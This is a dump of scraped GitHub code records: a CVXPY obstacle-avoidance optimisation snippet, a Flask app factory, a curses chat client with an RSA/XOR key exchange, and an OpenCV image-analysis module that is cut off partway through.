noinspection PyAttributeOutsideInit\n def setup_cp_problem(self):\n \"\"\"\n initially setup QCQP problem in CVXPY\n\n QCQP formulation:\n min ||lpg2d_star - lpg2d||^2\n s.t. ho_dot + classK >=0, ||lpg2d_star-g||^2<=||lpg2d-g||^2\n \n lpg2d - 2d local projected goal\n \"\"\"\n\n x = cp.Variable(2)\n P_mat = np.eye(2)\n P = cp.Parameter((2, 2), value=P_mat)\n q = cp.Parameter(2)\n l = cp.Parameter()\n A = cp.Parameter((2))\n m = cp.Parameter()\n\n objective = cp.Minimize(cp.norm(x - P @ q))\n constraints = [l <= A @ x, cp.norm(x) <= m]\n prob = cp.Problem(objective, constraints)\n\n self.x = x\n self.q = q\n self.l = l\n self.A = A\n self.m = m\n self.prob = prob\n\n return prob\n\n def update_cp_problem(self, lpg2d):\n \"\"\"\n update parameters in CVXPY problem\n \n INPUT\n lpg2d nominal 2d local projected goal computed from deltaE\n \"\"\"\n gvn2d = self.g[0:2] # 2d governor position\n ug2d = -1.0 * self.kg * (gvn2d - lpg2d) # 2d governor control input\n\n # update CVXPY parameters \n self.q.value = ug2d\n self.l.value = -self.classk_func_g - self.ho_dot_f\n self.A.value = self.ho_dot_g\n self.m.value = np.linalg.norm(ug2d)\n\n # solve QCQP\n self.prob.solve()\n ug2d_star = self.x.value\n\n # for infeasible problems, raise warning and qp_infeasible flag\n if ug2d_star is None:\n self.qp_infeasible = True\n rospy.logwarn_throttle(0.5, \"Moving obstacle avoidance Failed! Infeasible conditions\")\n lpg2d_star = gvn2d + ug2d / self.kg\n\n # output valid solution\n else:\n self.qp_infeasible = False\n lpg2d_star = gvn2d + ug2d_star / self.kg\n return lpg2d_star\n","repo_name":"zhl355/ERL_EAST","sub_path":"src/EAST/ref_gvn_core/src/ref_gvn_core/actlpg_optm.py","file_name":"actlpg_optm.py","file_ext":"py","file_size_in_byte":6912,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"26522029040","text":"import logging\nimport sys\nfrom flask import Flask\nfrom flask_migrate import Migrate\nfrom flask_cors import CORS\nfrom flask_jwt_extended import JWTManager\nfrom config import load_config\nfrom flask_sslify import SSLify\n\nfrom models import db\n\n\ndef create_app():\n app = Flask(__name__)\n\n # config_class = load_config(\"config.py\")\n config_class = load_config()\n\n app.config.from_object(config_class)\n\n cors = CORS(app)\n\n configure_database(app)\n\n jwt = JWTManager(app)\n\n # db.init_app(app)\n # migrate = Migrate(app, db)\n # Register blueprints\n register_blueprints(app)\n\n # Initialize flask extension objects\n # initialize_extensions(app)\n\n # Configure logging\n configure_logging(app)\n\n # Register error handlers\n register_error_handlers(app)\n\n # Enable SSL/TLS\n if app.config.get(\"ENV\") == \"PRODUCTION\":\n sslify = SSLify(app)\n\n return app\n\n\ndef configure_logging(app):\n # set up logging\n app.logger.addHandler(logging.StreamHandler(sys.stdout))\n app.logger.setLevel(logging.DEBUG)\n\n logging.basicConfig(\n level=logging.DEBUG, format=\"%(asctime)s %(levelname)s %(message)s\"\n )\n\n # Log the value of SQLALCHEMY_DATABASE_URI\n app.logger.debug(\n f\"SQLALCHEMY_DATABASE_URI: {app.config['SQLALCHEMY_DATABASE_URI']}\"\n )\n\n # We check if we are running directly or not\n if __name__ != \"__main__\":\n # if we are not running directly, we set the loggers\n gunicorn_logger = logging.getLogger(\"gunicorn.error\")\n app.logger.handlers = gunicorn_logger.handlers\n app.logger.setLevel(gunicorn_logger.level)\n\n\ndef configure_database(app):\n db.init_app(app)\n migrate = Migrate(app, db)\n with app.app_context():\n db.create_all()\n\n\ndef register_blueprints(app):\n from app.auth import auth_bp\n from app.main import main_bp\n from app.contact import contact_bp\n from app.library import library_bp\n from app.processimage import processimage_bp\n from app.recipe import recipe_bp\n from app.processurl import processurl_bp\n from app.imageupload import imageupload_bp\n\n app.register_blueprint(auth_bp, url_prefix=\"/auth\")\n app.register_blueprint(main_bp)\n app.register_blueprint(contact_bp, url_prefix=\"/api/contacts\")\n app.register_blueprint(library_bp, url_prefix=\"/api/library\")\n app.register_blueprint(processimage_bp, url_prefix=\"/api/processimage\")\n app.register_blueprint(recipe_bp, url_prefix=\"/api/recipe\")\n app.register_blueprint(processurl_bp, url_prefix=\"/api/processurl\")\n app.register_blueprint(imageupload_bp, url_prefix=\"/api/imageupload\")\n\n\ndef initialize_extensions(app):\n # mail.init_app(app)\n pass\n\n\ndef register_error_handlers(app):\n pass\n\n\ndef configure_logging(app):\n pass\n","repo_name":"ecdeise/flask_react_k8s","sub_path":"flask_api/app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"72618616129","text":"from rsa import PublicKey, encrypt as rsa_encrypt\r\nfrom threading import Thread\r\nfrom random import choice\r\nfrom time import ctime\r\nimport socket\r\nimport curses\r\nimport rsa\r\n\r\ndef err_handler(function):\r\n \r\n def wrapper(*args,**kwargs):\r\n try:\r\n result = function(*args,**kwargs)\r\n return result\r\n except Exception as err:\r\n screen.addstr(0, 0, function.__name__ + ' ' + str(err.args))\r\n with open('error_log.txt','a') as err_file:\r\n err_file.write('[' + ctime() + '] ' +' in ' + function.__name__ + ' ' + str(err.args) + '\\n')\r\n\r\n return wrapper\r\n\r\n\r\nclass Server_listener(Thread):\r\n \r\n def __init__(self):\r\n Thread.__init__(self)\r\n self.stop = False\r\n\r\n \r\n @err_handler\r\n def get_data(self):\r\n try:\r\n server_data = sock.recv(1024)\r\n if not server_data:\r\n add_str('system: disconnected by server')\r\n return False\r\n except ConnectionResetError:\r\n add_str('system: disconnected by server (connection reset)')\r\n return False\r\n return xor_crypt(server_data, xor_key).decode('utf-8')\r\n #return server_data.decode('utf-8')\r\n\r\n \r\n @err_handler\r\n def send_data(self, message):\r\n try:\r\n sock.send(xor_crypt(message.encode('utf-8'), xor_key))\r\n #sock.send(message.encode('utf-8'))\r\n return True\r\n except ConnectionResetError:\r\n add_str('system: disconnected by server')\r\n return False\r\n\r\n\r\n @err_handler\r\n def run(self):\r\n global disconnected\r\n while not self.stop:\r\n server_data = self.get_data()\r\n if server_data:\r\n add_str(server_data)\r\n else:\r\n disconnected = True\r\n break\r\n\r\n\r\n@err_handler\r\ndef print_screen() -> None:\r\n string_y = 1\r\n screen.border(0)\r\n if scrolled_strings:\r\n for string in strings[-max_strings - scrolled_strings : -scrolled_strings]:\r\n if string[0]:\r\n screen.addstr(string_y, 1, string[0], user_colors.get(string[0], colors['green']))\r\n screen.addstr(string_y, 1 + len(string[0]), string[1])\r\n else:\r\n screen.addstr(string_y, 1, string[1])\r\n string_y += 1\r\n else:\r\n for string in strings[-max_strings:]:\r\n if string[0]:\r\n if '@' + nickname in string[1]:\r\n screen.addstr(string_y, 1, string[0],user_colors.get(string[0], colors['green']))\r\n screen.addstr(string_y,1 + len(string[0]), string[1], curses.color_pair(7))\r\n else:\r\n screen.addstr(string_y, 1, string[0], user_colors.get(string[0], colors['green']))\r\n screen.addstr(string_y,1 + len(string[0]), string[1],curses.color_pair(8))\r\n else:\r\n screen.addstr(string_y,1, string[1])\r\n string_y += 1\r\n screen.refresh()\r\n\r\n\r\n@err_handler\r\ndef add_str(*new_strings) -> None:\r\n splitted_strings = []\r\n for new_string in new_strings:\r\n chunks = [new_string[i:i + STR_FREE_SPACE] for i in range(0, len(new_string), STR_FREE_SPACE)]\r\n # If length of new_string is more of screen x length, divides it by chunks\r\n chunks[0] = [(chunks[0])[:chunks[0].index(':')], ((chunks[0])[chunks[0].index(':'):])]\r\n # Some magic happens in upper string!\r\n for i in range(1, len(chunks)):\r\n chunks[i] = ['', chunks[i]]\r\n chunks[-1] = [chunks[-1][0],chunks[-1][1] + ' ' * (STR_FREE_SPACE - (len(chunks[-1][1]) + len(chunks[-1][0])))]\r\n # The length of last chunk probably will be less than screen length thus fill the last length by spaces\r\n splitted_strings.extend(chunks)\r\n strings.extend(splitted_strings)\r\n print_screen()\r\n\r\n\r\n@err_handler\r\ndef parse_command(command_string: str) -> str:\r\n words = command_string.split()\r\n if words[0] == '!create':\r\n return 'CREATE ' + words[1]\r\n elif words[0] == '!connect':\r\n if len(words) > 2:\r\n return 'CONNECT ' + words[1] + ' ' + words[2]\r\n else:\r\n return 'CONNECT ' + words[1] + ' '\r\n elif words[0] == '!rooms':\r\n return 'ROOMLIST'\r\n elif words[0] == '!users':\r\n return 'USERLIST'\r\n elif words[0] == '!disconnect':\r\n return 'DISCONNECT '\r\n elif words[0] == '!help':\r\n add_str('system: !create - create a room with a name',\r\n ': !connect - connect to a room',\r\n ': !disconnect - disconnect from the current room',\r\n ': !roomlist - see the list of public rooms',\r\n ': !users - see the list of users in current room',\r\n ': !clear - clear the list of messages')\r\n elif words[0] == '!ban':\r\n return 'BAN ' + words[1]\r\n elif words[0] == '!clear':\r\n strings.clear()\r\n for i in range(1,max_strings+1):\r\n screen.addstr(i, 1, ' '*(SCREEN_X - 2))\r\n elif words[0] == '!kick':\r\n return 'KICK ' + words[1]\r\n elif words[0] == '!password':\r\n return 'PASSWORD ' + words[1]\r\n elif words[0] == '!check':\r\n password = get_msg('Enter secret password no one knows(check): ')\r\n if password == 'check':\r\n add_str('pass_checker: Right! You so quick-witted!')\r\n else:\r\n add_str('pass_checker: Wrong password. Maybe you should think a little bit more')\r\n else:\r\n add_str('system: can not recognize \"'+words[0]+'\" command',\r\n ':try !help to see the list of commands')\r\n\r\n\r\n@err_handler \r\ndef get_msg(welcome_msg = '>>> ') -> str:\r\n global scrolled_strings\r\n letter_list = [] \r\n cursor_x = len(welcome_msg) + 1\r\n # the position of cursor after of printing the welcome message '+1' is a compensation of border symbol\r\n enter = False\r\n msg_free_space = STR_FREE_SPACE - len(welcome_msg)\r\n # the avaliable space for typed message '-2' is a compensation of both left and right borders\r\n screen.addstr(SCREEN_Y - 2, 1, welcome_msg)\r\n screen.refresh()\r\n while not enter:\r\n letter = screen.getch(SCREEN_Y - 2, cursor_x)\r\n if letter == 10: # Enter\r\n if letter_list:\r\n screen.addstr(SCREEN_Y - 2, 1, ' ' * STR_FREE_SPACE) # clear the input area\r\n enter = True\r\n elif letter == 8: # Backspace\r\n if letter_list:\r\n letter_x = len(welcome_msg) + 1\r\n letter_list.pop()\r\n screen.addstr(SCREEN_Y - 2,letter_x,' ' * msg_free_space)\r\n for char in letter_list[-msg_free_space:]:\r\n screen.addstr(SCREEN_Y - 2, letter_x, char)\r\n letter_x += 1\r\n if len(letter_list) < msg_free_space - 1:\r\n cursor_x -= 1\r\n elif letter == 259: # Arrow up\r\n if (max_strings + scrolled_strings + 1 <= len(strings)):\r\n scrolled_strings += 1\r\n print_screen()\r\n elif letter == 258: # Arrow down\r\n if scrolled_strings -1 >= 0:\r\n scrolled_strings -= 1\r\n print_screen()\r\n elif letter == 260: # Arrow left\r\n pass\r\n elif letter == 261: # Arrow right\r\n pass\r\n elif letter == 27: # Esc\r\n sock.close()\r\n exit()\r\n elif letter <32 or letter == 127: # prevent ctrl keypresses\r\n pass\r\n else: # Another char\r\n letter_list.append(chr(letter))\r\n letter_x = len(welcome_msg) + 1\r\n for char in letter_list[-msg_free_space:]:\r\n screen.addstr(SCREEN_Y - 2, letter_x, char)\r\n letter_x += 1\r\n if len(letter_list) < msg_free_space:\r\n cursor_x += 1\r\n return ''.join(letter_list) \r\n\r\n\r\n@err_handler\r\ndef pick_username() -> str:\r\n picked = False\r\n unique = False\r\n nickname = ''\r\n letter_pool = 'qwerttyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890_'\r\n while not unique:\r\n while not picked:\r\n nickname = get_msg('Enter your name: ') \r\n if len(nickname) > 3 and len(nickname) < 16:\r\n for letter in nickname:\r\n if not (letter in letter_pool):\r\n add_str('system: can contain only ASCII letters or numbers')\r\n break\r\n else:\r\n picked = True\r\n else:\r\n add_str('system: must be more than 3 and less than 16 letters')\r\n server_listener.send_data(('SETNAME ' + nickname))\r\n respond = server_listener.get_data()\r\n if respond.split()[0] == 'ACCEPT':\r\n unique = True\r\n add_str('system: nickname accepted')\r\n else:\r\n add_str('system:\"' + nickname + '\" is occupied!')\r\n picked = unique = False\r\n return nickname\r\n\r\n\r\n@err_handler\r\ndef connect_to_server(host: str, port: int) -> None:\r\n attempts = 1\r\n while attempts <= 3:\r\n try:\r\n add_str('system: trying to connect(' + str(attempts) + ')...')\r\n sock.connect((host, port))\r\n add_str('system: connected!','system: try !help to seethe list of commands')\r\n break\r\n except ConnectionError:\r\n attempts += 1\r\n else:\r\n add_str('system: can not connect to server!')\r\n desicion = get_msg('retry? (yes, no): ')\r\n if desicion[0] == 'y':\r\n connect_to_server(HOST, PORT)\r\n elif desicion[0] == 'n':\r\n exit()\r\n\r\n\r\n@err_handler\r\ndef xor_crypt(string:bytes, key:bytes) -> bytes:\r\n assert isinstance(string, bytes)\r\n assert isinstance(key, bytes)\r\n key_len = len(key)\r\n fitted_key = bytes(key[index % key_len] for index in range(len(string)))# fit the key to the length of a message\r\n crypto_str = bytes([string[index] ^ fitted_key[index] for index in range(len(string))])\r\n return crypto_str\r\n\r\n\r\nSCREEN_Y, SCREEN_X = 24, 80\r\nKEYLEN = 64\r\nSTR_FREE_SPACE = SCREEN_X - 2\r\nXOR_ALPHABET = b'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTYVWXYZ1234567890+/'\r\nscreen = curses.initscr()\r\nscreen.resize(SCREEN_Y, SCREEN_X)\r\nscreen.keypad(True)\r\ncurses.start_color()\r\ncurses.noecho()\r\n\r\ncurses.init_pair(1, curses.COLOR_RED, curses.COLOR_BLACK)\r\ncurses.init_pair(2, curses.COLOR_BLUE, curses.COLOR_BLACK)\r\ncurses.init_pair(3, curses.COLOR_YELLOW, curses.COLOR_BLACK)\r\ncurses.init_pair(4, curses.COLOR_CYAN, curses.COLOR_BLACK)\r\ncurses.init_pair(5, curses.COLOR_MAGENTA, curses.COLOR_BLACK)\r\ncurses.init_pair(6, curses.COLOR_GREEN, curses.COLOR_BLACK)\r\ncurses.init_pair(7, curses.COLOR_BLACK, curses.COLOR_WHITE)\r\ncurses.init_pair(8, curses.COLOR_WHITE, curses.COLOR_BLACK)\r\n\r\ncolors = {\r\n 'red':curses.color_pair(1),\r\n 'blue':curses.color_pair(2),\r\n 'yellow':curses.color_pair(3),\r\n 'cyan':curses.color_pair(4),\r\n 'magenta':curses.color_pair(5),\r\n 'green':curses.color_pair(6)\r\n }\r\n\r\nuser_colors = {\r\n 'system':colors['red'],\r\n }\r\n\r\nmax_strings = SCREEN_Y - 3\r\nxor_key = bytes([choice(XOR_ALPHABET) for i in range(KEYLEN)])\r\nscrolled_strings = 0\r\nstrings = []\r\ndisconnected = False\r\nprog_is_alive = True\r\nHOST, PORT = '127.0.0.1', 9090\r\nnickname = ''\r\n\r\nif __name__ == '__main__':\r\n try:\r\n while prog_is_alive:\r\n server_listener = Server_listener()\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n connect_to_server(HOST,PORT)\r\n \r\n #establishing a secure connection\r\n tagged_server_pub = sock.recv(1024)\r\n server_pub = PublicKey.load_pkcs1(tagged_server_pub)\r\n xor_encrypted_key = rsa_encrypt(xor_key, server_pub)\r\n sock.send(xor_encrypted_key)\r\n \r\n disconnected = False\r\n nickname = pick_username()\r\n server_listener.start()\r\n user_colors[nickname] = colors['blue']\r\n while not disconnected:\r\n message = get_msg()\r\n if len(message) > 255:\r\n add_str('system: 255 symbols message limit')\r\n continue\r\n if not (message.strip() in ('','\\n','\\t','\\r')):\r\n if message[0] == '!':\r\n command = parse_command(message)\r\n if command:\r\n sent = server_listener.send_data(command)\r\n if not sent:\r\n disconnected = True\r\n else:\r\n sent = server_listener.send_data('MESSAGE ' + nickname + \": \" + message)\r\n if not sent:\r\n disconnected = True\r\n except Exception as err:\r\n screen.addstr(0,0,' '+str(err.args))\r\n with open('error_log.txt','a') as err_file:\r\n err_file.write('[' + ctime() + '] ' +' in ' + function.__name__ + ' ' + str(err.args) + '\\n')\r\n","repo_name":"IGORYUCH/chirper","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":13097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"21948074179","text":"\"\"\"Функции для обработки изображения\"\"\"\nimport os\nimport cv2\nimport urllib.request\nimport numpy as np\nimport base64\nimport seaborn as sns\n\nfrom matplotlib import pyplot as plt\n\n\n\n\n# define the path to the face detector and smile detector\nFACE_DETECTOR_PATH = \"{base_path}/cascades/haarcascade_frontalface_default.xml\".format(\n base_path=os.path.abspath(os.path.dirname(__file__)))\n\nSMILE_DETECTOR_PATH = \"{base_path}/cascades/haarcascade_smile.xml\".format(\n base_path=os.path.abspath(os.path.dirname(__file__)))\n\n# path to trained faces and labels\nTRAINED_FACES_PATH = \"{base_path}/faces\".format(\n base_path=os.path.abspath(os.path.dirname(__file__)))\n\n# maximum distance between face and match\nTHRESHOLD = 75\n\n# create the cascade classifiers\ndetector = cv2.CascadeClassifier(FACE_DETECTOR_PATH)\nsmiledetector = cv2.CascadeClassifier(SMILE_DETECTOR_PATH)\n\n\ndef _grab_image(path=None, base64_string=None, url=None):\n # if the path is not None, then load the image from disk\n if path is not None:\n image = cv2.imread(path)\n # otherwise, the image does not reside on disk\n else:\n # if the URL is not None, then download the image\n if url is not None:\n with urllib.request.urlopen(url) as resp:\n data = resp.read()\n image = np.asarray(bytearray(data), dtype=\"uint8\")\n image = cv2.imdecode(image, cv2.IMREAD_COLOR)\n\n # if the stream is not None, then the image has been uploaded\n elif base64_string is not None:\n # sbuf = StringIO()\n # sbuf.write(base64.b64decode(base64_string))\n # pimg = Image.open(sbuf)\n # image = cv2.cvtColor(np.array(pimg), cv2.COLOR_RGB2BGR)\n\n image = base64.b64decode(base64_string)\n image = np.fromstring(image, dtype=np.uint8)\n image = cv2.imdecode(image, 1)\n # convert the image to a NumPy array and then read it into\n # OpenCV format\n # return the image\n return image\n\n\n# laplacian\ndef get_variance_of_laplacian(image):\n # compute the Laplacian of the image and then return the focus\n # measure, which is simply the variance of the Laplacian\n return cv2.Laplacian(image, cv2.CV_64F).var()\n\n\n# findconturs\ndef get_conturs(img, gray_image):\n # Контуры\n edged = cv2.Canny(gray_image, 10, 300)\n contours, hierarchy = cv2.findContours(edged,\n cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n # print(\"Number of Contours found = \" + str(len(contours)))\n # Draw all contours\n # -1 signifies drawing all contours\n cv2.drawContours(img, contours, -1, (0, 255, 255), 1)\n cv2.drawContours(gray_image, contours, -1, (0, 255, 255), 1)\n # viewImage(img)\n return int(len(contours))\n\n\n# draw lines of composition\ndef draw_lines_of_composition(img):\n scale_percent = 100\n width = int(img.shape[1] * scale_percent / 100)\n height = int(img.shape[0] * scale_percent / 100)\n # линии\n cv2.line(img, (int(width / 3), 0), (int(width / 3), height), (200, 255, 255), 1)\n cv2.line(img, (int(width * 2 / 3), 0), (int(width * 2 / 3), height), (200, 255, 255), 1)\n cv2.line(img, (0, int(height / 3)), (int(width), int(height / 3)), (200, 255, 255), 1)\n cv2.line(img, (0, int(height * 2 / 3)), (int(width), int(height * 2 / 3)), (200, 255, 255), 1)\n\n cv2.circle(img, (int(width / 3), int(height / 3)), 5, (0, 255, 100), -1)\n cv2.circle(img, (int(width * 2 / 3), int(height / 3)), 5, (0, 255, 100), -1)\n cv2.circle(img, (int(width / 3), int(height * 2 / 3)), 5, (0, 255, 100), -1)\n cv2.circle(img, (int(width * 2 / 3), int(height * 2 / 3)), 5, (0, 255, 100), -1)\n\n cv2.line(img, (int(width / 3), int(height / 3)), (int(width / 3), int(height * 2 / 3)), (0, 255, 100), 2)\n cv2.line(img, (int(width / 3), int(height / 3)), (int(width * 2 / 3), int(height / 3)), (0, 255, 100), 2)\n cv2.line(img, (int(width / 3), int(height * 2 / 3)), (int(width * 2 / 3), int(height * 2 / 3)), (0, 255, 100), 2)\n cv2.line(img, (int(width * 2 / 3), int(height / 3)), (int(width * 2 / 3), int(height * 2 / 3)), (0, 255, 100), 2)\n\n wh = int(width / 6)\n cv2.circle(img, (int(width / 3), int(height / 3)), wh, (0, 255, 100), 1)\n cv2.circle(img, (int(width * 2 / 3), int(height / 3)), wh, (0, 255, 100), 1)\n cv2.circle(img, (int(width / 3), int(height * 2 / 3)), wh, (0, 255, 100), 1)\n cv2.circle(img, (int(width * 2 / 3), int(height * 2 / 3)), wh, (0, 255, 100), 1)\n\n\n# print blur/focus level\ndef print_blur_image(img, iMax):\n a = list(range(iMax)) # список по количеству строк\n for iW in range(0, iMax, 1):\n a[iW] = list(range(iMax))\n scale_percent = 100\n width = int(img.shape[1] * scale_percent / 100)\n height = int(img.shape[0] * scale_percent / 100)\n for iH in range(0, iMax, 1):\n crop_img = img[int(height * iH / iMax):int(height * (iH + 1) / iMax),\n int(width * iW / iMax):int(width * (iW + 1) / iMax)]\n icrop = cv2.cvtColor(crop_img, cv2.COLOR_BGR2GRAY)\n a[iW][iH] = int(get_variance_of_laplacian(icrop))\n\n for iW in range(0, iMax, 1):\n for iH in range(0, iMax, 1):\n if a[iH][iW] < np.mean(a):\n\n cv2.putText(img, str(a[iH][iW]), (int(width * iW / iMax) + 10, int(height * iH / iMax) + 30),\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, (100, 100, 100), 2)\n cv2.line(img, (int(width * iW / iMax), int(height * iH / iMax)),\n (int(width * iW / iMax), int(height * iMax / iMax)), (100, 100, 100), 1)\n cv2.line(img, (int(width * iW / iMax), int(height * iH / iMax)),\n (int(width * iMax / iMax), int(height * iH / iMax)), (100, 100, 100), 1)\n else:\n if a[iH][iW] < np.max(a) * 0.5:\n cv2.putText(img, str(a[iH][iW]), (int(width * iW / iMax) + 10, int(height * iH / iMax) + 30),\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, (250, 250, 230), 2)\n cv2.line(img, (int(width * iW / iMax), int(height * iH / iMax)),\n (int(width * iW / iMax), int(height * iMax / iMax)), (200, 100, 255), 1)\n cv2.line(img, (int(width * iW / iMax), int(height * iH / iMax)),\n (int(width * iMax / iMax), int(height * iH / iMax)), (200, 100, 255), 1)\n else: # max\n cv2.putText(img, str(a[iH][iW]), (int(width * iW / iMax) + 10, int(height * iH / iMax) + 30),\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2)\n cv2.line(img, (int(width * iW / iMax), int(height * iH / iMax)),\n (int(width * iW / iMax), int(height * iMax / iMax)), (0, 0, 255), 1)\n cv2.line(img, (int(width * iW / iMax), int(height * iH / iMax)),\n (int(width * iMax / iMax), int(height * iH / iMax)), (0, 0, 255), 1)\n return a\n\n\n# Контурный анализ\ndef print_conturs_of_image(img, iMax):\n a = list(range(iMax)) # список по количеству строк\n for iW in range(0, iMax, 1):\n a[iW] = list(range(iMax))\n scale_percent = 100\n width = int(img.shape[1] * scale_percent / 100)\n height = int(img.shape[0] * scale_percent / 100)\n for iH in range(0, iMax, 1):\n crop_img = img[int(height * iH / iMax):int(height * (iH + 1) / iMax),\n int(width * iW / iMax):int(width * (iW + 1) / iMax)]\n crop_img = cv2.cvtColor(crop_img, cv2.COLOR_BGR2GRAY)\n icrop = cv2.Canny(crop_img, 5, 300)\n contours, hierarchy = cv2.findContours(icrop,\n cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n\n a[iW][iH] = int(str(len(contours)))\n # cv2.drawContours(img, contours, -1, (0, 255, 255), 1)\n\n for iW in range(0, iMax, 1):\n for iH in range(0, iMax, 1):\n\n if a[iH][iW] < np.mean(a):\n cv2.putText(img, str(a[iH][iW]), (int(width * iW / iMax) + 10, int(height * iH / iMax) + 50),\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, (100, 100, 100), 1)\n cv2.line(img, (int(width * iW / iMax), int(height * iH / iMax)),\n (int(width * iW / iMax), int(height * iMax / iMax)), (200, 255, 255), 1)\n cv2.line(img, (int(width * iW / iMax), int(height * iH / iMax)),\n (int(width * iMax / iMax), int(height * iH / iMax)), (200, 255, 255), 1)\n else:\n if a[iH][iW] < int(np.max(a) * 0.5):\n h1 = int(height * iH / iMax)\n h2 = int(height * (iH + 1) / iMax)\n w1 = int(width * iW / iMax)\n w2 = int(width * (iW + 1) / iMax)\n\n cv2.putText(img, str(a[iH][iW]), (int(width * iW / iMax) + 10, int(height * iH / iMax) + 50),\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, (250, 250, 230), 1) # 255, 215, 0\n cv2.line(img, (int(width * iW / iMax), int(height * iH / iMax)),\n (int(width * iW / iMax), int(height * iMax / iMax)), (200, 255, 255), 1)\n cv2.line(img, (int(width * iW / iMax), int(height * iH / iMax)),\n (int(width * iMax / iMax), int(height * iH / iMax)), (200, 255, 255), 1)\n else: # max\n cv2.putText(img, str(a[iH][iW]), (int(width * iW / iMax) + 10, int(height * iH / iMax) + 50),\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2)\n cv2.line(img, (int(width * iW / iMax), int(height * iH / iMax)),\n (int(width * iW / iMax), int(height * iMax / iMax)), (220, 200, 0), 1)\n cv2.line(img, (int(width * iW / iMax), int(height * iH / iMax)),\n (int(width * iMax / iMax), int(height * iH / iMax)), (220, 200, 0), 1)\n return a\n\n\ndef draw_histogram(image, filename):\n image_blue = image[:, :, 0]\n image_green = image[:, :, 1]\n image_red = image[:, :, 2]\n\n X_b = np.array(image_blue.flatten())[:, np.newaxis]\n X_g = np.array(image_green.flatten())[:, np.newaxis]\n X_r = np.array(image_red.flatten())[:, np.newaxis]\n\n # print(\"Изображение успешно загружено и разделено на каналы!\")\n fig, (RGB, blue, green, red) = plt.subplots(4, 1)\n fig.set_size_inches(18.5, 10.5)\n\n RGB.legend(loc='upper right')\n RGB.set_title('Гистограмма RGB:', fontsize=12)\n sns.distplot(X_b, bins=256, kde=False, rug=False, norm_hist=False, ax=RGB, color=\"blue\", label=\"Синий Канал\")\n sns.distplot(X_g, bins=256, kde=False, rug=False, norm_hist=False, ax=RGB, color=\"green\", label=\"Зеленый Канал\")\n sns.distplot(X_r, bins=256, kde=False, rug=False, norm_hist=False, ax=RGB, color=\"red\", label=\"Красный канал\")\n RGB.legend(loc='upper right')\n\n blue.set_title('Синий Канал:', fontsize=12)\n sns.distplot(X_b, bins=256, kde=False, rug=False, norm_hist=False, ax=blue, color=\"blue\", label=\"Синий Канал\")\n blue.legend(loc='upper right')\n\n green.set_title('Зеленый Канал:', fontsize=12)\n sns.distplot(X_g, bins=256, kde=False, rug=False, norm_hist=False, ax=green, color=\"green\", label=\"Зеленый Канал\")\n green.legend(loc='upper right')\n\n red.set_title('Красный канал:', fontsize=12)\n sns.distplot(X_r, bins=256, kde=False, rug=False, norm_hist=False, ax=red, color=\"red\", label=\"Красный канал\")\n red.legend(loc='upper right')\n\n plt.savefig(TRAINED_FACES_PATH + \"/\" + \"img/2/\" + filename)\n\n # Экстремумы\n bandwidth = 10\n\n X_plot = np.linspace(0, 255, 256)[:, np.newaxis]\n # print(type(X_plot))\n # print(\"Загружаем данные о цветовых каналах в модель. Построение модели происходит для каждого канала в отдельности\")\n kde_blue = KernelDensity(kernel='epanechnikov', bandwidth=bandwidth).fit(X_b)\n # print(\"Аппроксимация для синего канала успешно рассчитана!\")\n kde_green = KernelDensity(kernel='epanechnikov', bandwidth=bandwidth).fit(X_g)\n # print(\"Аппроксимация для зеленого канала успешно рассчитана!\")\n kde_red = KernelDensity(kernel='epanechnikov', bandwidth=bandwidth).fit(X_r)\n # print(\"Аппроксимация для красного канала успешно рассчитана!\")\n log_dens_blue = kde_blue.score_samples(X_plot)\n log_dens_green = kde_green.score_samples(X_plot)\n log_dens_red = kde_red.score_samples(X_plot)\n\n fig_2, (blue_kde, green_kde, red_kde) = plt.subplots(3, 1)\n fig_2.set_size_inches(18.5, 10.5)\n\n sns.distplot(X_b, bins=256, kde=False, rug=False, norm_hist=True, ax=blue_kde, color=\"blue\", label=\"Blue Channel\")\n sns.distplot(X_g, bins=256, kde=False, rug=False, norm_hist=True, ax=green_kde, color=\"green\",\n label=\"Green Channel\")\n sns.distplot(X_r, bins=256, kde=False, rug=False, norm_hist=True, ax=red_kde, color=\"red\", label=\"Red Channel\")\n blue_kde.plot(X_plot[:, 0], np.exp(log_dens_blue), '-', label=\"Kernel - Epanechnikov\")\n green_kde.plot(X_plot[:, 0], np.exp(log_dens_green), '-', label=\"Kernel - Epanechnikov\")\n red_kde.plot(X_plot[:, 0], np.exp(log_dens_red), '-', label=\"Kernel - Epanechnikov\")\n\n blue_kde.legend(loc='upper right')\n green_kde.legend(loc='upper right')\n red_kde.legend(loc='upper right')\n\n fig_3, (diff_ax) = plt.subplots(1, 1)\n fig_3.set_size_inches(18.5, 10.5)\n\n ################################### Рассчет первой производной ######################################\n diff = np.gradient(np.exp(log_dens_blue))\n diff_list = list(diff)\n xc_1, xi_1 = pyaC.zerocross1d(X_plot[:, 0], diff, getIndices=True)\n\n # zeros_list = list(int(x) for x in xc_1)\n zeros = np.array(np.reshape(xc_1, (len(xc_1), 1)))\n samples = kde_blue.score_samples(zeros)\n log_dens_blue_in_zeros = np.exp(samples)\n # построение графика функции аппроксимации и первой производной #\n diff_ax.set_ylim(-0.005, 0.025)\n diff_ax.axhline(y=0, color=\"black\")\n diff_ax.set_title('First derivative over KDE Function (Epanechnikov):', fontsize=12)\n diff_ax.plot(X_plot[:, 0], diff, color=\"red\", label=\"Первая производная от функции аппроксимации\")\n diff_ax.scatter(xc_1, log_dens_blue_in_zeros, marker='*', s=130, color=\"blue\", label=\"Ноль производной - 